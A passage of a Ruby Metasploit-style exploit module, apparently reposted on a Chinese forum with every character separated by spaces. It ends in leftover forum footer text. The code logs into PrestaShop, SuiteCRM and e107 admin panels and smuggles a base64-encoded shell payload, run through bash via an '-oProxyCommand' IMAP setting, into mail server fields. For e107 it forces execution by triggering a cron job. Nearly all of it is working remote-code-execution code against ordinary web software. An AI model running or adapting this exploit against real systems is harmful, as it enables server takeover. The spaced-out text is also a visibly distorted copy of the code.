a g e ' )             r e s   =   s e n d _ r e q u e s t _ c g i (                 ' u r i '   = >   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h ,   ' i n d e x . p h p ' ) ,                 ' v a r s _ g e t '   = >   {                     ' a c t i o n '   = >   ' L o g i n ' ,                     ' m o d u l e '   = >   ' U s e r s '                 }             )             u n l e s s   r e s                 p r i n t _ e r r o r ( ' E r r o r   l o a d i n g   s i t e .     C h e c k   o p t i o n s . ' )                 r e t u r n             e n d             i f   r e s . c o d e   =   2 0 0                 r e t u r n   C h e c k C o d e : : D e t e c t e d             e n d       e n d       C h e c k C o d e : : S a f e     e n d     d e f   c o m m a n d ( s p a c e s = ' $ I F S $ ( ) ' )         # p a y l o a d   i s   b a s e 6 4   e n c o d e d ,   a n d   s t u f f e d   i n t o   t h e   S S H   o p t i o n .         e n c _ p a y l o a d   =   R e x : : T e x t . e n c o d e _ b a s e 6 4 ( p a y l o a d . e n c o d e d )         c o m m a n d   =   " - o P r o x y C o m m a n d = ` e c h o   # { e n c _ p a y l o a d } | b a s e 6 4   - d | b a s h ` "         # f i n a l   p a y l o a d   c a n   n o t   c o n t a i n   s p a c e s ,   h o w e v e r   $ I F S $ ( )   w i l l   r e t u r n   t h e   s p a c e   w e   r e q u i r e         c o m m a n d . g s u b ! ( '   ' ,   s p a c e s )     e n d     d e f   e x p l o i t         i f   t a r g e t . n a m e   = ~   / p r e s t a s h o p /             u r i   =   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h )             r e s   =   s e n d _ r e q u e s t _ c g i ( { ' u r i '   = >   u r i } )             i f   r e s   & &   r e s . c o d e   ! =   3 0 1                 p r i n t _ e r r o r ( ' A d m i n   r e d i r e c t   n o t   f o u n d ,   c h e c k   U R I .     S h o u l d   b e   s o m e t h i n g   s i m i l a r   t o   / a d m i n 2 7 6 9 g x 8 k 3 ' )                 r e t u r n             e n d             # T h e r e   a r e   a   b u n c h   o f   r e d i r e c t s   t h a t   h a p p e n ,   s o   w e   a u t o m a t e   g o i n g   t h r o u g h   t h e m   t o   g e t   t o   t h e   l o g i n   p a g e .             w h i l e   r e s . c o d e   = =   3 0 1   | |   r e s . c o d e   = =   3 0 2                 c o o k i e   =   r e s . g e t _ c o o k i e s                 u r i   =   r e s . h e a d e r s [ ' L o c a t i o n ' ]
                u r i   =   r e s . h e a d e r s [ ' L o c a t i o n ' ]                 v p r i n t _ s t a t u s ( " R e d i r e c t e d   t o   # { u r i } " )                 r e s   =   s e n d _ r e q u e s t _ c g i ( { ' u r i '   = >   u r i } )             e n d             # T o k e n s   a r e   g e n e r a t e d   f o r   e a c h   U R L   o r   s u b - c o m p o n e n t ,   w e   n e e d   v a l i d   o n e s !             / . * t o k e n = ( ? < t o k e n > w { 3 2 } ) /   = ~   u r i             / i d = " r e d i r e c t "   v a l u e = " ( ? < r e d i r e c t > . * ) " / > /   = ~   r e s . b o d y             c o o k i e   =   r e s . g e t _ c o o k i e s             u n l e s s   t o k e n   & &   r e d i r e c t                 p r i n t _ e r r o r ( ' U n a b l e   t o   f i n d   t o k e n   a n d   r e d i r e c t   U R L ,   c h e c k   o p t i o n s . ' )                 r e t u r n             e n d             v p r i n t _ s t a t u s ( " T o k e n :   # { t o k e n }   a n d   L o g i n   R e d i r e c t :   # { r e d i r e c t } " )             p r i n t _ s t a t u s ( " L o g g i n g   i n   w i t h   # { d a t a s t o r e [ ' U S E R N A M E ' ] } : # { d a t a s t o r e [ ' P A S S W O R D ' ] } " )             r e s   =   s e n d _ r e q u e s t _ c g i (                 ' m e t h o d '   = >   ' P O S T ' ,                 ' u r i '         = >   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h ,   ' i n d e x . p h p ' ) ,                 ' c o o k i e '   = >   c o o k i e ,                 ' v a r s _ p o s t '   = >   {                     ' a j a x '   = >   1 ,                     ' t o k e n '   = >   ' ' ,                     ' c o n t r o l l e r '   = >   ' A d m i n L o g i n ' ,                     ' s u b m i t L o g i n '   = >   ' 1 ' ,                     ' p a s s w d '   = >   d a t a s t o r e [ ' P A S S W O R D ' ] ,                     ' e m a i l '   = >   d a t a s t o r e [ ' U S E R N A M E ' ] ,                     ' r e d i r e c t '   = >   r e d i r e c t                 } ,                 ' v a r s _ g e t '   = >   {                     ' r a n d '   = >   ' 1 5 4 2 5 8 2 3 6 4 8 1 0 '   # n o t   s u r e   i f   t h i s   w i l l   h o l d   t r u e   f o r e v e r ,   I   d i d n ' t   s e e   w h e r e   i t   i s   b e i n g   g e n e r a t e d                 }             )             i f   r e s   & &   r e s . b o d y . i n c l u d e ? ( ' I n v a l i d   p a s s w o r d ' )                 p r i n t _ e r r o r ( ' I n v a l i d   L o g i n ' )                 r e t u r n             e n d             v p r i n t _ s t a t u s ( " L o g i n   J S O N   R e s p o n s e :   # { r e s . b o d y } " )             u r i   =   J S O N . p a r s e ( r e s . b o d y ) [ ' r e d i r e c t ' ]             c o o k i e   =   r e s . g e t _ c o o k i e s             p r i n t _ g o o d ( ' L o g i n   S u c c e s s ,   l o a d i n g   a d m i n   d a s h b o a r d   t o   p u l l   t o k e n s ' )             r e s   =   s e n d _ r e q u e s t _ c g i ( { ' u r i '   = >   u r i ,   ' c o o k i e '   = >   c o o k i e } )             / A d m i n C u s t o m e r T h r e a d s & t o k e n = ( ? < t o k e n > w { 3 2 } ) /   = ~   r e s . b o d y             v p r i n t _ s t a t u s ( " C u s t o m e r   T h r e a d s   T o k e n :   # { t o k e n } " )             r e s   =   s e n d _ r e q u e s t _ c g i ( {                 ' u r i '   = >   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h ,   ' i n d e x . p h p ' ) ,                 ' c o o k i e '   = >   c o o k i e ,                 ' v a r s _ g e t '   = >   {                     ' c o n t r o l l e r '   = >   ' A d m i n C u s t o m e r T h r e a d s ' ,                     ' t o k e n '   = >   t o k e n                 }             } )             / f o r m   m e t h o d = " p o s t "   a c t i o n = " i n d e x . p h p ? c o n t r o l l e r = A d m i n C u s t o m e r T h r e a d s & t o k e n = ( ? < t o k e n > w { 3 2 } ) /   = ~   r e s . b o d y             p r i n t _ g o o d ( " S e n d i n g   P a y l o a d   w i t h   F i n a l   T o k e n :   # { t o k e n } " )             d a t a   =   R e x : : M I M E : : M e s s a g e . n e w             d a t a . a d d _ p a r t ( ' 1 ' ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ C U S T O M E R _ S E R V I C E _ F I L E _ U P L O A D " ' )             d a t a . a d d _ p a r t ( " D e a r   C u s t o m e r , n n R e g a r d s , n C u s t o m e r   s e r v i c e " ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ C U S T O M E R _ S E R V I C E _ S I G N A T U R E _ 1 " ' )             d a t a . a d d _ p a r t ( " x   # { c o m m a n d } } " ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ S A V _ I M A P _ U R L " ' )             d a t a . a d d _ p a r t ( ' 1 4 3 ' ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ S A V _ I M A P _ P O R T " ' )             d a t a . a d d _ p a r t ( R e x : : T e x t . r a n d _ t e x t _ a l p h a n u m e r i c ( 8 ) ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ S A V _ I M A P _ U S E R " ' )             d a t a . a d d _ p a r t ( R e x : : T e x t . r a n d _ t e x t _ a l p h a n u m e r i c ( 8 ) ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ S A V _ I M A P _ P W D " ' )             d a t a . a d d _ p a r t ( ' 0 ' ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ S A V _ I M A P _ D E L E T E _ M S G " ' )             d a t a . a d d _ p a r t ( ' 0 ' ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ S A V _ I M A P _ C R E A T E _ T H R E A D S " ' )             d a t a . a d d _ p a r t ( ' 0 ' ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ S A V _ I M A P _ O P T _ P O P 3 " ' )             d a t a . a d d _ p a r t ( ' 0 ' ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ S A V _ I M A P _ O P T _ N O R S H " ' )             d a t a . a d d _ p a r t ( ' 0 ' ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ S A V _ I M A P _ O P T _ S S L " ' )             d a t a . a d d _ p a r t ( ' 0 ' ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ S A V _ I M A P _ O P T _ V A L I D A T E - C E R T " ' )             d a t a . a d d _ p a r t ( ' 0 ' ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ S A V _ I M A P _ O P T _ N O V A L I D A T E - C E R T " ' )             d a t a . a d d _ p a r t ( ' 0 ' ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ S A V _ I M A P _ O P T _ T L S " ' )             d a t a . a d d _ p a r t ( ' 0 ' ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " P S _ S A V _ I M A P _ O P T _ N O T L S " ' )             d a t a . a d d _ p a r t ( ' ' ,   n i l ,   n i l ,   ' f o r m - d a t a ;   n a m e = " s u b m i t O p t i o n s c u s t o m e r _ t h r e a d " ' )             s e n d _ r e q u e s t _ c g i (                 ' m e t h o d '   = >   ' P O S T ' ,                 ' u r i '         = >   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h ,   ' i n d e x . p h p ' ) ,                 ' c t y p e '     = >   " m u l t i p a r t / f o r m - d a t a ;   b o u n d a r y = # { d a t a . b o u n d } " ,                 ' d a t a '       = >   d a t a . t o _ s ,                 ' c o o k i e '   = >   c o o k i e ,                 ' v a r s _ g e t '   = >   {                     ' c o n t r o l l e r '   = >   ' A d m i n C u s t o m e r T h r e a d s ' ,                     ' t o k e n '   = >   t o k e n                 }             )             p r i n t _ s t a t u s ( ' I M A P   s e r v e r   c h a n g e   l e f t   o n   s e r v e r ,   m a n u a l   r e v e r t   r e q u i r e d . ' )
            i f   r e s   & &   r e s . b o d y . i n c l u d e ? ( ' i m a p   I s   N o t   I n s t a l l e d   O n   T h i s   S e r v e r ' )                 p r i n t _ e r r o r ( ' P H P   I M A P   m o d   n o t   i n s t a l l e d / e n a b l e d   ' )             e n d         e l s i f   t a r g e t . n a m e   = ~   / s u i t e c r m /             # l o g i n   p a g e   G E T   / i n d e x . p h p ? a c t i o n = L o g i n & m o d u l e = U s e r s             v p r i n t _ s t a t u s ( ' L o a d i n g   l o g i n   p a g e ' )             r e s   =   s e n d _ r e q u e s t _ c g i (                 ' u r i '   = >   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h ,   ' i n d e x . p h p ' ) ,                 ' v a r s _ g e t '   = >   {                     ' a c t i o n '   = >   ' L o g i n ' ,                     ' m o d u l e '   = >   ' U s e r s '                 }             )             u n l e s s   r e s                 p r i n t _ e r r o r ( ' E r r o r   l o a d i n g   s i t e .     C h e c k   o p t i o n s . ' )                 r e t u r n             e n d             i f   r e s . c o d e   =   2 0 0                 c o o k i e   =   r e s . g e t _ c o o k i e s             e l s e                 p r i n t _ e r r o r ( " H T T P   c o d e   # { r e s . c o d e }   f o u n d ,   c h e c k   o p t i o n s . " )                 r e t u r n             e n d             v p r i n t _ s t a t u s ( " L o g g i n g   i n   a s   # { d a t a s t o r e [ ' U S E R N A M E ' ] } : # { d a t a s t o r e [ ' P A S S W O R D ' ] } " )             r e s   =   s e n d _ r e q u e s t _ c g i (                 ' m e t h o d '   = >   ' P O S T ' ,                 ' u r i '   = >   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h ,   ' i n d e x . p h p ' ) ,                 ' c o o k i e '   = >   c o o k i e ,                 ' v a r s _ p o s t '   = >   {                     ' m o d u l e '   = >   ' U s e r s ' ,                     ' a c t i o n '   = >   ' A u t h e n t i c a t e ' ,                     ' r e t u r n _ m o d u l e '   = >   ' U s e r s ' ,                     ' r e t u r n _ a c t i o n '   = >   ' L o g i n ' ,                     ' c a n t _ l o g i n '   = >   ' ' ,                     ' l o g i n _ m o d u l e '   = >   ' ' ,                     ' l o g i n _ a c t i o n '   = >   ' ' ,                     ' l o g i n _ r e c o r d '   = >   ' ' ,                     ' l o g i n _ t o k e n '   = >   ' ' ,                     ' l o g i n _ o a u t h _ t o k e n '   = >   ' ' ,                     ' l o g i n _ m o b i l e '   = >   ' ' ,                     ' u s e r _ n a m e '   = >   d a t a s t o r e [ ' U S E R N A M E ' ] ,                     ' u s e r n a m e _ p a s s w o r d '   = >   d a t a s t o r e [ ' P A S S W O R D ' ] ,                     ' L o g i n '   = >   ' L o g + I n '                 }             )             u n l e s s   r e s                 p r i n t _ e r r o r ( ' E r r o r   l o a d i n g   s i t e .     C h e c k   o p t i o n s . ' )                 r e t u r n             e n d             i f   r e s . c o d e   =   3 0 2                 c o o k i e   =   r e s . g e t _ c o o k i e s                 p r i n t _ g o o d ( ' L o g i n   S u c c e s s ' )             e l s e                 p r i n t _ e r r o r ( ' F a i l e d   L o g i n ,   c h e c k   o p t i o n s . ' )             e n d             # l o a d   t h e   e m a i l   s e t t i n g s   p a g e   t o   g e t   t h e   g r o u p _ i d             v p r i n t _ s t a t u s ( ' L o a d i n g   I n b o u n d E m a i l   p a g e ' )             r e s   =   s e n d _ r e q u e s t _ c g i (                 ' u r i '   = >   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h ,   ' i n d e x . p h p ' ) ,                 ' c o o k i e '   = >   c o o k i e ,                 ' v a r s _ g e t '   = >   {                     ' m o d u l e '   = >   ' I n b o u n d E m a i l ' ,                     ' a c t i o n '   = >   ' E d i t V i e w '                 }             )             u n l e s s   r e s                 p r i n t _ e r r o r ( ' E r r o r   l o a d i n g   s i t e . ' )                 r e t u r n             e n d             / " g r o u p _ i d "   v a l u e = " ( ? < g r o u p _ i d > w { 8 } - w { 4 } - w { 4 } - w { 4 } - w { 1 2 } ) " > /   = ~   r e s . b o d y             u n l e s s   g r o u p _ i d                 p r i n t _ e r r o r ( ' C o u l d   n o t   i d e n t i f y   g r o u p _ i d   f r o m   f o r m   p a g e ' )                 r e t u r n             e n d             p r i n t _ g o o d ( " S e n d i n g   p a y l o a d   w i t h   g r o u p _ i d   # { g r o u p _ i d } " )             r e f e r e r   =   " h t t p : / / # { d a t a s t o r e [ ' R H O S T ' ] } # { n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h ,   ' i n d e x . p h p ' ) } ? m o d u l e = I n b o u n d E m a i l & a c t i o n = E d i t V i e w "             r e s   =   s e n d _ r e q u e s t _ c g i (                 ' m e t h o d '   = >   ' P O S T ' ,
                ' u r i '   = >   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h ,   ' i n d e x . p h p ' ) ,                 ' c o o k i e '   = >   c o o k i e ,                 # r e q u i r e d   t o   p r e v e n t   C S R F   p r o t e c t i o n   f r o m   t r i g g e r i n g                 ' h e a d e r s '   = >   {   ' R e f e r e r '   = >   r e f e r e r } ,                 ' v a r s _ p o s t '   = >   {                     ' m o d u l e '   = >   ' I n b o u n d E m a i l ' ,                     ' r e c o r d '   = >   ' ' ,                     ' o r i g i n _ i d '   = >   ' ' ,                     ' i s D u p l i c a t e '   = >   ' f a l s e ' ,                     ' a c t i o n '   = >   ' S a v e ' ,                     ' g r o u p _ i d '   = >   g r o u p _ i d ,                     ' r e t u r n _ m o d u l e '   = >   ' ' ,                     ' r e t u r n _ a c t i o n '   = >   ' ' ,                     ' r e t u r n _ i d '   = >   ' ' ,                     ' p e r s o n a l '   = >   ' ' ,                     ' s e a r c h F i e l d '   = >   ' ' ,                     ' m a i l b o x _ t y p e '   = >   ' ' ,                     ' b u t t o n '   = >   '     S a v e     ' ,                     ' n a m e '   = >   R e x : : T e x t . r a n d _ t e x t _ a l p h a n u m e r i c ( 8 ) ,                     ' s t a t u s '   = >   ' A c t i v e ' ,                     ' s e r v e r _ u r l '   = >   " x   # { c o m m a n d } } " ,                     ' e m a i l _ u s e r '   = >   R e x : : T e x t . r a n d _ t e x t _ a l p h a n u m e r i c ( 8 ) ,                     ' p r o t o c o l '   = >   ' i m a p ' ,                     ' e m a i l _ p a s s w o r d '   = >   R e x : : T e x t . r a n d _ t e x t _ a l p h a n u m e r i c ( 8 ) ,                     ' p o r t '   = >   ' 1 4 3 ' ,                     ' m a i l b o x '   = >   ' I N B O X ' ,                     ' t r a s h F o l d e r '   = >   ' T R A S H ' ,                     ' s e n t F o l d e r '   = >   ' ' ,                     ' f r o m _ n a m e '   = >   R e x : : T e x t . r a n d _ t e x t _ a l p h a n u m e r i c ( 8 ) ,                     ' i s _ a u t o _ i m p o r t '   = >   ' o n ' ,                     ' f r o m _ a d d r '   = >   " # { R e x : : T e x t . r a n d _ t e x t _ a l p h a n u m e r i c ( 8 ) } @ # { R e x : : T e x t . r a n d _ t e x t _ a l p h a n u m e r i c ( 8 ) } . o r g " ,                     ' r e p l y _ t o _ n a m e '   = >   ' ' ,                     ' d i s t r i b _ m e t h o d '   = >   ' A O P D e f a u l t ' ,                     ' d i s t r i b u t i o n _ u s e r _ n a m e '   = >   ' ' ,                     ' d i s t r i b u t i o n _ u s e r _ i d '   = >   ' ' ,                     ' d i s t r i b u t i o n _ o p t i o n s [ 0 ] '   = >   ' a l l ' ,                     ' d i s t r i b u t i o n _ o p t i o n s [ 1 ] '   = >   ' ' ,                     ' d i s t r i b u t i o n _ o p t i o n s [ 2 ] '   = >   ' ' ,                     ' c r e a t e _ c a s e _ t e m p l a t e _ i d '   = >   ' ' ,                     ' r e p l y _ t o _ a d d r '   = >   ' ' ,                     ' t e m p l a t e _ i d '   = >   ' ' ,                     ' f i l t e r _ d o m a i n '   = >   ' ' ,                     ' e m a i l _ n u m _ a u t o r e p l i e s _ 2 4 _ h o u r s '   = >   ' 1 0 ' ,                     ' l e a v e M e s s a g e s O n M a i l S e r v e r '   = >   ' 1 '                 }             )             i f   r e s   & &   r e s . c o d e   = =   2 0 0                 p r i n t _ e r r o r ( ' T r i g g e r e d   C S R F   p r o t e c t i o n ,   m a y   t r y   e x p l o i t a t i o n   m a n u a l l y . ' )             e n d             p r i n t _ s t a t u s ( ' I M A P   s e r v e r   c o n f i g   l e f t   o n   s e r v e r ,   m a n u a l   r e m o v a l   r e q u i r e d . ' )         e l s i f   t a r g e t . n a m e   = ~   / e 1 0 7 v 2 /             #   e 1 0 7   h a s   a n   e n c o d e r   w h i c h   p r e v e n t s   $ I F S $ ( )   f r o m   b e i n g   u s e d   a s   $   =   & # 0 3 6 ;             #   t   a l s o   b e c a m e   / t ,   h o w e v e r   " t "   d o e s   s e e m   t o   w o r k .             #   e 1 0 7   a l s o   u s e s   a   c r o n   j o b   t o   c h e c k   b o u n c e   j o b s ,   w h i c h   m a y   n o t   b e   a c t i v e .             #   e i t h e r   c r o n   c a n   b e   d i s a b l e d ,   o r   b o u n c e   c h e c k s   d i s a b l e d ,   s o   w e   t r y   t o             #   k i c k   t h e   p r o c e s s   m a n u a l l y ,   h o w e v e r   i f   i t   d o e s n ' t   w o r k   w e ' l l   h o p e             #   c r o n   i s   r u n n i n g   a n d   w e   g e t   a   c a l l   b a c k   a n y w a y s .             v p r i n t _ s t a t u s ( " L o g g i n g   i n   a s   # { d a t a s t o r e [ ' U S E R N A M E ' ] } : # { d a t a s t o r e [ ' P A S S W O R D ' ] } " )             r e s   =   s e n d _ r e q u e s t _ c g i (                 ' m e t h o d '   = >   ' P O S T ' ,                 ' u r i '   = >   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h ,   ' e 1 0 7 _ a d m i n ' ,   ' a d m i n . p h p ' ) ,                 ' v a r s _ p o s t '   = >   {                     ' a u t h n a m e '   = >   d a t a s t o r e [ ' U S E R N A M E ' ] ,                     ' a u t h p a s s '   = >   d a t a s t o r e [ ' P A S S W O R D ' ] ,                     ' a u t h s u b m i t '   = >   ' L o g   I n '             } )             u n l e s s   r e s                 p r i n t _ e r r o r ( ' E r r o r   l o a d i n g   s i t e .     C h e c k   o p t i o n s . ' )                 r e t u r n             e n d             i f   r e s . c o d e   = =   3 0 2                 c o o k i e   =   r e s . g e t _ c o o k i e s                 p r i n t _ g o o d ( ' L o g i n   S u c c e s s ' )             e l s e                 p r i n t _ e r r o r ( ' F a i l e d   L o g i n ,   c h e c k   o p t i o n s . ' )             e n d             v p r i n t _ s t a t u s ( ' C h e c k i n g   i f   C r o n   i s   e n a b l e d   f o r   t r i g g e r i n g ' )             r e s   =   s e n d _ r e q u e s t _ c g i (                 ' u r i '   = >   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h ,   ' e 1 0 7 _ a d m i n ' ,   ' c r o n . p h p ' ) ,                 ' c o o k i e '   = >   c o o k i e             )             u n l e s s   r e s                 p r i n t _ e r r o r ( ' E r r o r   l o a d i n g   s i t e .     C h e c k   o p t i o n s . ' )                 r e t u r n
                r e t u r n             e n d             i f   r e s . b o d y . i n c l u d e ?   ' S t a t u s :   < b > D i s a b l e d < / b > '                 p r i n t _ e r r o r ( ' C r o n   d i s a b l e d ,   u n e x p l o i t a b l e . ' )                 r e t u r n             e n d             p r i n t _ g o o d ( ' S t o r i n g   p a y l o a d   i n   m a i l   s e t t i n g s ' )             #   t h e   i m a p / p o p   f i e l d   i s   h a r d   t o   f i n d .   C h e c k   U s e r s   >   M a i l             #   t h e n   c h e c k   " B o u n c e d   e m a i l s   -   P r o c e s s i n g   m e t h o d "   a n d   s e t   i t   t o   " M a i l   a c c o u n t "             s e n d _ r e q u e s t _ c g i (                 ' m e t h o d '   = >   ' P O S T ' ,                 ' u r i '   = >   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h ,   ' e 1 0 7 _ a d m i n ' ,   ' m a i l o u t . p h p ' ) ,                 ' c o o k i e '   = >   c o o k i e ,                 ' v a r s _ g e t '   = >   {                     ' m o d e '   = >   ' p r e f s ' ,                     ' a c t i o n '   = >   ' p r e f s '                 } ,                 ' v a r s _ p o s t '   = >   {                     ' t e s t a d d r e s s '   = >   ' n o n e @ n o n e . c o m ' ,                     ' t e s t t e m p l a t e '   = >   ' t e x t o n l y ' ,                     ' b u l k m a i l e r '   = >   ' s m t p ' ,                     ' s m t p _ s e r v e r '   = >   ' 1 . 1 . 1 . 1 ' ,                     ' s m t p _ u s e r n a m e '   = >   ' u s e r n a m e ' ,                     ' s m t p _ p a s s w o r d '   = >   ' p a s s w o r d ' ,                     ' s m t p _ p o r t '   = >   ' 2 5 ' ,                     ' s m t p _ o p t i o n s '   = >   ' ' ,                     ' s m t p _ k e e p a l i v e '   = >   ' 0 ' ,                     ' s m t p _ u s e V E R P '   = >   ' 0 ' ,                     ' m a i l _ s e n d s t y l e '   = >   ' t e x t h t m l ' ,                     ' m a i l _ p a u s e '   = >   ' 3 ' ,                     ' m a i l _ p a u s e t i m e '   = >   ' 4 ' ,                     ' m a i l _ w o r k p e r t i c k '   = >   ' 5 ' ,                     ' m a i l _ l o g _ o p t i o n '   = >   ' 0 ' ,                     ' m a i l _ b o u n c e '   = >   ' m a i l ' ,                     ' m a i l _ b o u n c e _ e m a i l 2 '   = >   ' ' ,                     ' m a i l _ b o u n c e _ e m a i l '   = >   " # { R e x : : T e x t . r a n d _ t e x t _ a l p h a n u m e r i c ( 8 ) } @ # { R e x : : T e x t . r a n d _ t e x t _ a l p h a n u m e r i c ( 8 ) } . o r g " ,                     ' m a i l _ b o u n c e _ p o p 3 '   = >   " x   # { c o m m a n d ( " t " ) } } " ,                     ' m a i l _ b o u n c e _ u s e r '   = >   R e x : : T e x t . r a n d _ t e x t _ a l p h a n u m e r i c ( 8 ) ,                     ' m a i l _ b o u n c e _ p a s s '   = >   R e x : : T e x t . r a n d _ t e x t _ a l p h a n u m e r i c ( 8 ) ,                     ' m a i l _ b o u n c e _ t y p e '   = >   ' i m a p ' ,                     ' m a i l _ b o u n c e _ a u t o '   = >   ' 1 ' ,                     ' u p d a t e p r e f s '   = >   ' S a v e   C h a n g e s '             } )             v p r i n t _ s t a t u s ( ' L o a d i n g   c r o n   p a g e   t o   e x e c u t e   j o b   m a n u a l l y ' )             r e s   =     s e n d _ r e q u e s t _ c g i (                 ' u r i '   = >   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h ,   ' e 1 0 7 _ a d m i n ' ,   ' c r o n . p h p ' ) ,                 ' c o o k i e '   = >   c o o k i e             )             u n l e s s   r e s                 p r i n t _ e r r o r ( ' E r r o r   l o a d i n g   s i t e .     C h e c k   o p t i o n s . ' )                 r e t u r n             e n d             i f   / n a m e = ' e - t o k e n '   v a l u e = ' ( ? < e t o k e n > w { 3 2 } ) ' /   = ~   r e s . b o d y   & &   / _ s y s t e m : : p r o c E m a i l B o u n c e . + ? c r o n _ e x e c u t e [ ( ? < c r o n _ i d > d ) ] / m   = ~   r e s . b o d y                 p r i n t _ g o o d ( " T r i g g e r i n g   m a n u a l   r u n   o f   m a i l   b o u n c h   c h e c k   c r o n   t o   e x e c u t e   p a y l o a d   w i t h   c r o n   i d   # { c r o n _ i d }   a n d   e t o k e n   # { e t o k e n } " )                 #   T h e   p o s t   r e q u e s t   h a s   s e v e r a l   d u p l i c a t e   c o l u m n s ,   h o w e v e r   a l l   w e r e   n o t   r e q u i r e d .     L e f t   t h e m   c o m m e n t e d   f o r   d o c u m e n t a t i o n   p u r p o s e s                 s e n d _ r e q u e s t _ c g i (                     ' m e t h o d '   = >   ' P O S T ' ,                     ' u r i '   = >   n o r m a l i z e _ u r i ( t a r g e t _ u r i . p a t h ,   ' e 1 0 7 _ a d m i n ' ,   ' c r o n . p h p ' ) ,                     ' c o o k i e '   = >   c o o k i e ,                     ' v a r s _ p o s t '   = >   {                         ' e - t o k e n '   = >   e t o k e n ,                         # ' e - c o l u m n s [ ] '   = >   ' c r o n _ c a t e g o r y ' ,                         ' e - c o l u m n s [ ] '   = >   ' c r o n _ n a m e ' ,                         # ' e - c o l u m n s [ ] '   = >   ' c r o n _ d e s c r i p t i o n ' ,                         # ' e - c o l u m n s [ ] '   = >   ' c r o n _ f u n c t i o n ' ,                         # ' e - c o l u m n s [ ] '   = >   ' c r o n _ t a b ' ,                         # ' e - c o l u m n s [ ] '   = >   ' c r o n _ l a s t r u n ' ,                         # ' e - c o l u m n s [ ] '   = >   ' c r o n _ a c t i v e ' ,                         " c r o n _ e x e c u t e [ # { c r o n _ i d } ] "   = >   ' 1 ' ,                         ' e t r i g g e r _ b a t c h '   = >   ' '                 } )             e l s e                 p r i n t _ e r r o r ( ' e - t o k e n   n o t   f o u n d ,   r e q u i r e d   f o r   m a n u a l   e x p l o i t a t i o n .     W a i t   6 0 s e c ,   c r o n   m a y   s t i l l   t r i g g e r . ' )             e n d             p r i n t _ s t a t u s ( ' I M A P   s e r v e r   c o n f i g   l e f t   o n   s e r v e r ,   m a n u a l   r e m o v a l   r e q u i r e d . ' )         e l s i f   t a r g e t . n a m e   = ~   / c u s t o m /             p r i n t _ s t a t u s ( ' L i s t e n e r   s t a r t e d   f o r   3 0 0   s e c o n d s ' )             p r i n t _ g o o d ( " P O S T   r e q u e s t   c o n n e c t i o n   s t r i n g :   x   # { c o m m a n d } } " )             #   U R I . e n c o d e   l e a v e s   +   a s   +   s i n c e   t h a t ' s   a   s p a c e   e n c o d e d .     S o   w e   m a n u a l l y   c h a n g e   i t .             p r i n t _ g o o d ( " G E T   r e q u e s t   c o n n e c t i o n   s t r i n g :   # { U R I . e n c o d e ( " x   "   +   c o m m a n d   +   " } " ) . s u b !   ' + ' ,   ' % 2 B ' } " )         e n d
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理